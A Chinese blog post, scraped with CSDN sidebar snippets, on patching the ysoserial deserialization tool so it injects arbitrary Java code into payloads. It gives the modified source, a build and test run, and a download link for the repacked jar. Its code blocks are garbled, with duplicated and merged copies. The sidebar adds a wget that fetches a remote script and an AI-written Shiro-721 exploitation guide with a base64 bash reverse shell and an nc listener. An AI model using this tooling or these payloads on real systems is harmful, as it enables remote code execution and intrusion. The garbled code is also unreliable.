修改ysoserial使其支持生成代码执行Payload

最新推荐文章于 2025-04-25 11:11:10 发布
最新推荐文章于 2025-04-25 11:11:10 发布
阅读量1w 收藏 4
点赞数 4
CC 4.0 BY-SA版权
分类专栏: Java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fnmsd/article/details/79534877
本文介绍如何修改ysoserial工具以实现Java反序列化Payload的任意代码执行,而非仅限于命令执行,并提供实操步骤及适用范围。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。

https://github.com/frohoff/ysoserial

一般该工具可生成执行任意命令的序列化对象,通过对工具代码进行简单修改,也可使其执行任意的Java代码,以此来绕过对命令执行的限制。

修改

作者在115行的注释写到: TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections(待做,可以做一些有趣的事情比如注入一个纯java的反弹或绑定shell去绕过较弱的保护)已经留出了进行代码执行的位置,实质上一般用的命令执行是调用的写死的Runtime调用,这里我们只需要稍微改下即可。

ysoserial/src/main/java/ysoserial/payloads/util/Gadgets.java这个文件中(105行):

​
    public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
            throws Exception {
        final T templates = tplClass.newInstance();
​
        // use template gadget class
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        pool.insertClassPath(new ClassClassPath(abstTranslet));
        final CtClass clazz = pool.get(StubTransletPayload.class.getName());
        // run command in static initializer
        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections 
        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
            command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
            "\");";
        clazz.makeClassInitializer().insertAfter(cmd);
        // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        CtClass superC = pool.get(abstTranslet.getName());
        clazz.setSuperclass(superC);
​
        final byte[] classBytes = clazz.toBytecode();
​
        // inject class bytes into instance
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
            classBytes, ClassFiles.classAsBytes(Foo.class)
        });
​
        // required to make TemplatesImpl happy
        Reflections.setFieldValue(templates, "_name", "Pwnr");
        Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
        return templates;
    }
    public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
            throws Exception {
        final T templates = tplClass.newInstance();
​
        // use template gadget class
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        pool.insertClassPath(new ClassClassPath(abstTranslet));
        final CtClass clazz = pool.get(StubTransletPayload.class.getName());
        // run command in static initializer
        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections 
        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
            command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
            "\");";
        clazz.makeClassInitializer().insertAfter(cmd);
        // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        CtClass superC = pool.get(abstTranslet.getName());
        clazz.setSuperclass(superC);
​
        final byte[] classBytes = clazz.toBytecode();
​
        // inject class bytes into instance
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
            classBytes, ClassFiles.classAsBytes(Foo.class)
        });
​
        // required to make TemplatesImpl happy
        Reflections.setFieldValue(templates, "_name", "Pwnr");
        Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
        return templates;
    }

进行简单的修改:


  public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
            throws Exception {
        final T templates = tplClass.newInstance();
​
        // use template gadget class
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        pool.insertClassPath(new ClassClassPath(abstTranslet));
        final CtClass clazz = pool.get(StubTransletPayload.class.getName());
        // run command in static initializer
        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
        String cmd="";
      //如果以code:开头,认为是代码,否则认为是命令
        if(!command.startsWith("code:")){
        cmd = "java.lang.Runtime.getRuntime().exec(\"" +
            command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
            "\");";}
            else{
            System.err.println("Java Code Mode:"+command.substring(5));//使用stderr输出,防止影响payload的输出
            cmd = command.substring(5);
        }
​
        clazz.makeClassInitializer().insertAfter(cmd);
        // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        CtClass superC = pool.get(abstTranslet.getName());
        clazz.setSuperclass(superC);
​
        final byte[] classBytes = clazz.toBytecode();
​
        // inject class bytes into instance
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
            classBytes, ClassFiles.classAsBytes(Foo.class)
        });  public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
            throws Exception {
        final T templates = tplClass.newInstance();
​
        // use template gadget class
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        pool.insertClassPath(new ClassClassPath(abstTranslet));
        final CtClass clazz = pool.get(StubTransletPayload.class.getName());
        // run command in static initializer
        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
        String cmd="";
      //如果以code:开头,认为是代码,否则认为是命令
        if(!command.startsWith("code:")){
        cmd = "java.lang.Runtime.getRuntime().exec(\"" +
            command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
            "\");";}
            else{
            System.err.println("Java Code Mode:"+command.substring(5));//使用stderr输出,防止影响payload的输出
            cmd = command.substring(5);
        }
​
        clazz.makeClassInitializer().insertAfter(cmd);
        // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        CtClass superC = pool.get(abstTranslet.getName());
        clazz.setSuperclass(superC);
​
        final byte[] classBytes = clazz.toBytecode();
​
        // inject class bytes into instance
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
            classBytes, ClassFiles.classAsBytes(Foo.class)
        });

mvn clean package -DskipTests进行重新打包

适用范围

由于不是所有的payload在构造时都调用了Gadgets.createTemplatesImpl,所以只有以下几种适用于以上修改。

ROME

CommonsBeanutils1

CommonsCollections2

CommonsCollections3

CommonsCollections4

Spring1

Spring2

Jdk7u21

MozillaRhino1

JBossInterceptors1

JavassistWeld1

JSON1

Hibernate1

其它部分Payload(如CommonsCollections1)可以通过手工改造进行执行任意代码。

试验


java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "code:new java.io.FileOutputStream(\"test\").write(112);" > 1.class
#Java Code Mode:new java.io.FileOutputStream("test").write(112);
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar LoadObject 1.class #LoadObject是照着格式写的一个反序列化payload文件的payload~
#查看当前目录可以发现多了一个test文件java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "code:new java.io.FileOutputStream(\"test\").write(112);" > 1.class
#Java Code Mode:new java.io.FileOutputStream("test").write(112);
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar LoadObject 1.class #LoadObject是照着格式写的一个反序列化payload文件的payload~
#查看当前目录可以发现多了一个test文件

下载

打包好的jar文件。

 链接:https://pan.baidu.com/s/12o5UFaln0qDUo0hPcIR1Eg 提取码:qdfc

ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3795
ysoserial这款工具,堪称为“java反序列利用神器”。
Java单向代码执行链配合的动态代码
qf2019的博客
04-21 407
Java 反序列化漏洞的危害不仅在于普通小工具所能带来的命令执行,还在于使用链构建的单向代码链所能实现的有限能力,因为Java应用程序场景和小工具大多构建单向代码执行。然而,在大多数情况下,比如需要echo和注入内存shell,我们实际上非常需要直接运行整个类或者运行一个上下文相关的多行代码来进行动态执行。它经常要求反序列化使用一个链来与另一个能够动态执行代码的链合作。这也是我们在这里主要讨论的情况。下面将简要介绍一些相对常见的方法,在这些方法中,下面的部分可以直接在动态代码上下文中执行。 单向代码利用了链
Java反序列化生成Payload附利用脚本
02-12
Java反序列化生成Payload附利用脚本,帮助运维测试weblogic及jboss等中间件的漏洞。
axis2生成客户端代码_利用ysoserial生成有回显的java反序列化payload(socket监听方式)...
weixin_39957934的博客
12-26 471
在测试过程中,遇到存在java反序列化漏洞的环境,一般使用ysoserial生成反序列化payload,但ysoserial一般用来执行命令,或者利用JRMPListener开启指定端口,利用JRMPClient发送攻击数据。JRMPListener需要使用ysoserial的JRMPClient来生成序列化的对象发送到服务端的JRMPListener进行反序列化操作,来达到执行命令看...
ysoserial 的安装和配置教程
最新发布
gitblog_00552的博客
04-25 528
ysoserial 的安装和配置教程 ysoserial A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ...
ysoserial payloads/JRMPClient
洋洋的小黑屋
07-27 589
ysoserial payloads/JRMPClient 环境:JDK8u102 payloads/JRMPClient可以配合exploit/JRMPListener模块来使用 1.在自己服务器上使用exploit/JRMPListener来开启监听 2.把payloads/JRMPClient发送给对方服务器,对方服务器反序列化后会反向连接我们的服务器,进行连接之间我们服务器会发送payload给对方服务器进行反序列化执行命令。 以下是执行ysoserial时候使用的命令: java -cp ysos
ysoserial:一款生成Java反序列化payload的工具
gitblog_00902的博客
04-07 763
ysoserial:一款生成Java反序列化payload的工具 ysoserial A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ...
java restfulapi 返回文件base64_Java反序列化:一次构造后Ysoserial Payload
weixin_36230923的博客
01-15 820
前言在一次应用安全测试中发现了一个的Java反序列化漏洞,该漏洞最终导致未经身份验证的远程代码执行。经过实践,发现利用此漏洞并不像之前使用Ysoserial生成默认payload那样简单。所以在本篇文章中,我将逐步介绍并修改Ysoserial的使用过程以及在其中所遇到的问题。漏洞利用点问题一:直接的Payload无法利用发现点是位于一个解码base64参数的地方,该参数返回了一个像blo...
在 Kafka UI 中获得远程代码执行的 3 种方法
Tananarivel的博客
12-24 755
Kafka UI 是一个现代应用程序,它使用强大的 Java 功能来监控 Kafka 集群,例如 Groovy 脚本、JMX 和 SASL JAAS。当暴露给用户输入时,应小心限制这些功能,以防止潜在的滥用。这些技术并非 Kafka UI 所独有,而是由 Java 开发工具包提供并用于许多其他项目。在过去几年中,JDK 开发人员对 JMX 和 JNDI 漏洞进行了大量强化,修补了一些攻击媒介。尽管如此,正如我们所看到的,它们在某些情况下仍然可以被利用,即使在最新的 JDK 版本中也是如此。
代码审计-dubbo admin <=2.6.1远程命令执行漏洞
weixin_47208161的博客
02-12 6754
前置输入材料安全目标和需求架构分析供应链安全源代码审查依赖结构矩阵(Dependency Structure Matrices,DSM)数据流信任边界数据存贮威胁列表otter mana...
106-记一次突破反弹shell.pdf
09-20
通过ysoserial生成特定的payload,可以利用Java的socket来创建一个反弹shell,这种方式不依赖于目标系统的环境。 6. payloadrunner类和getObject方法: 在ysoserial中,payloadrunner类用于执行payload,而...
ysoserial.jar
06-01
shrio反序裂化利用工具,JAVA反序裂化利用工具。 https://github.com/frohoff/ysoserial 源码编辑而来。 def generator(command, fp,key): if not os.path.exists(fp): print('Jar zai na ne ?') raise Exception('jar file not found!') popen = subprocess.Popen(['java', '-jar', fp, 'URLDNS', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key), mode, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext 代码中需要的jar包
Json.NET反序列化漏洞生成Ysoserial攻击Payload
ahhacker86的专栏
11-14 301
如果想使用ObjectInstance就必须创建类的实例,然而Process类在实例化时BasePriority、ExitCode等多个属性在Json.NET序列化的时候抛出异常,导致序列化失败。从$type类型得知序列化使用了ObjectDataProvider类,MethodParameters.Add方法的参数是一个ArrayList集合,既然知道了原理我们尝试序列化出Ysoserial这段攻击载荷,TestClass.ClassMethod()内部调用Process.Start启动进程,
ysoserial payloads/JRMPListener
洋洋的小黑屋
07-28 105
payloads/JRMPListener JRMPListener的攻击流程: 1.生成payloads/JRMPListener发送给服务器,当服务器反序列化payloads/JRMPListener后,即会开启一个端口进行监听。 2.使用exploit/JRMPClient模块发送payload,服务器就会把payload进行反序列化,从而完成进行攻击。 直接通过ysoserial源码调试...
ysoserial生成payload无效?
J5ong的博客
08-22 1954
ysoserial生成payload无效?  最近在写反序列化的poc,payload自然是用ysoserial生成,然后,攻击失败!!!(攻击vulhub docker上的靶机) 使用的语句:java -jar ysoserial.jar CommonsCollections1 'touch /tmp/success' &gt; d:\payload.ser 就很懵,开始了漫漫找原因之...
YSOSERIAL Payloads分析笔记(2)
fnmsd的博客
04-01 6297
前沿 继续接着前面的进行分析。 说一句感想:YSO的Payloads有个特点:在目标的readObject的过程中尽量不触发异常。emm,当然后面由于类型的不匹配什么的造成的异常就跟反序列化过程没关系了。 BeanShell1 BeanShell是什么? BeanShell是一个小型嵌入式Java源代码解释器,具有对象脚本语言特性,能够动态地执行标准JAVA语法,并利用在JavaScript和P...
(渗透学习)ysoserial工具使用--java反序列化漏洞利用
热门推荐
yang1234567898的博客
01-03 1万+
工具下载地址:https://github.com/angelwhu/ysoserial 使用方法可参考:https://blog.youkuaiyun.com/weixin_34275734/article/details/92243836 靶场webgoat---Insecure Deserializetion---5 分析漏洞: 题目给的数据是rO0AB开头,所以是经过了base64加密的java序列化对象。 解码后是一段英文,百度翻译也没发现有啥用处: 题目还给出了一个接收序列化数据的表单.
ysoserial的代码学习
问题很多的小明
08-29 818
反序列化漏洞利用神器:ysoserial 0x01ysoserial 工具模块 我们以为shiro远程加载反序列化数据的利用场景为例: java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget http://xxx.xxx.xxx.xxx:8080/1.sh -O test' 其中-cp指定了类路径为: ysoserial.exploit.
ysoserial Gadgets.createTemplatesImpl函数分析
fnmsd的博客
03-13 3358
前言 在阅读《java反序列化工具ysoserial分析》之后,对ysoserial有了一些更深的了解,但文章在对createTemplatesImpl函数进行分析时有一些缺失,没有解释一些代码作用,本文是对createTemplatesImpl函数分析的一些补充及一些疑问。 在阅读本文前请先阅读《java反序列化工具ysoserial分析》中关于createTemplatesImpl分析的部分 ...
shiro721漏洞复现过程
03-24
<think>好的,用户想了解Shiro721漏洞的复现步骤。首先,我需要回忆一下相关的知识。根据提供的引用内容,特别是引用[2]和[4],Shiro721影响版本是Apache Shiro <=1.4.1。复现步骤通常包括环境搭建、利用漏洞获取权限、编写或使用Payload等。 首先,环境搭建部分,用户需要Docker来拉取镜像并运行容器。引用[2]提到使用vulfocus/shiro-721镜像,所以需要确认正确的Docker命令。然后,漏洞利用需要生成恶意Cookie,通常涉及反序列化攻击。但Shiro721与Shiro550不同,它需要有效的Cookie并通过Padding Oracle攻击来加密Payload,因此可能需要特定的工具,比如shiro-exploit工具箱或者手工构造Payload。 用户可能还需要了解如何检测漏洞是否存在,比如发送一个无效的RememberMe Cookie并观察响应是否有特征。此外,反弹shell的步骤需要生成Payload,可能使用ysoserial或类似工具生成,然后通过工具加密并构造请求。 需要注意的是,复现漏洞需要一定的网络安全知识,确保在合法授权环境下进行。同时,引用中提到的工具如shiro-exploit可能需要从GitHub获取,用户需要安装相关依赖,比如Java环境。 可能的问题点包括Docker环境是否正确启动,Payload生成是否正确,加密过程是否无误,以及如何判断攻击是否成功。此外,用户可能对漏洞原理感兴趣,比如为什么Padding Oracle攻击可以在这里利用,或者如何修复该漏洞。因此,在回答中需要分步骤详细说明,并提示安全注意事项。</think>### Shiro-721漏洞复现步骤详解 #### 一、漏洞简介 Shiro-721是Apache Shiro框架中的反序列化漏洞,影响版本为**Shiro <=1.4.1**。攻击者通过构造恶意RememberMe Cookie,利用Padding Oracle攻击加密反序列化Payload,最终实现远程代码执行[^2][^4]。 #### 二、环境搭建 1. **拉取Docker镜像**: ```bash docker pull vulfocus/shiro-721 ``` 2. **启动容器**: ```bash docker run -d -p 8080:8080 [镜像ID] ``` 访问`http://localhost:8080`,使用默认账号`admin/admin`登录[^4]。 --- #### 三、漏洞验证 1. **检测RememberMe功能**: 登录后查看Cookie是否包含`rememberMe=deleteMe`字段,确认Shiro是否启用该功能。 2. **发送无效Cookie测试**: 使用Burp Suite修改请求,替换`rememberMe`值为无效Base64字符串(如`123`),若响应包含`rememberMe=deleteMe`,则存在漏洞[^3]。 --- #### 四、漏洞利用(以反弹Shell为例) 1. **生成Payload**: 使用`ysoserial`生成反弹Shell命令: ```bash java -jar ysoserial.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > payload.bin ``` **注意**:替换IP和端口为攻击机地址。 2. **加密Payload**: 使用`shiro-exploit`工具加密Payload,需提供有效的RememberMe Cookie和攻击目标URL: ```bash java -jar shiro-exploit.jar http://localhost:8080/login [有效Cookie] payload.bin ``` 工具会自动通过Padding Oracle攻击生成加密后的恶意Cookie。 3. **发送恶意请求**: 将生成的Cookie替换到请求头中,触发反序列化漏洞: ```http GET / HTTP/1.1 Host: localhost:8080 Cookie: rememberMe=[加密后的恶意Cookie] ``` 4. **接收反弹Shell**: 在攻击机使用Netcat监听: ```bash nc -lvnp 8888 ``` 成功获取目标服务器Shell[^3]。 --- #### 五、修复建议 1. 升级Shiro至**1.4.2及以上版本**; 2. 配置`securityManager.rememberMeManager.cipherKey`为随机密钥; 3. 禁用RememberMe功能(非必要场景)[^4]。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值